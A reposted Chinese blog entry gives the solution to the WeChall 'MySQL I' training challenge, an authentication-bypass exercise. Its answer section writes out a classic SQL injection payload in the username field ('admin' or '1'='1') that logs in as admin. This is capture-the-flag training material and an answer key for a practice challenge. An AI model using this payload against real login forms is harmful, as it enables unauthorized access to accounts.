首页 > 数据库技术 > 详细

[WeChall] Training: MySQL I (MySQL, Exploit, Training)

时间:2018-12-13 15:20:10      阅读:254      评论:0      收藏:0      [点我收藏+]

Training: MySQL I (MySQL, Exploit, Training)
MySQL Authentication Bypass - The classic
This one is the classic mysql injection challenge.
Your mission is easy: Login yourself as admin.
Again you are given the sourcecode, also as highlighted version.
Enjoy!

技术分享图片

原题地址:http://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php


题解:

username: admin‘ or ‘1‘=‘1
passowrd: anyone

[WeChall] Training: MySQL I (MySQL, Exploit, Training)

原文:https://www.cnblogs.com/xiaomulei/p/10113964.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!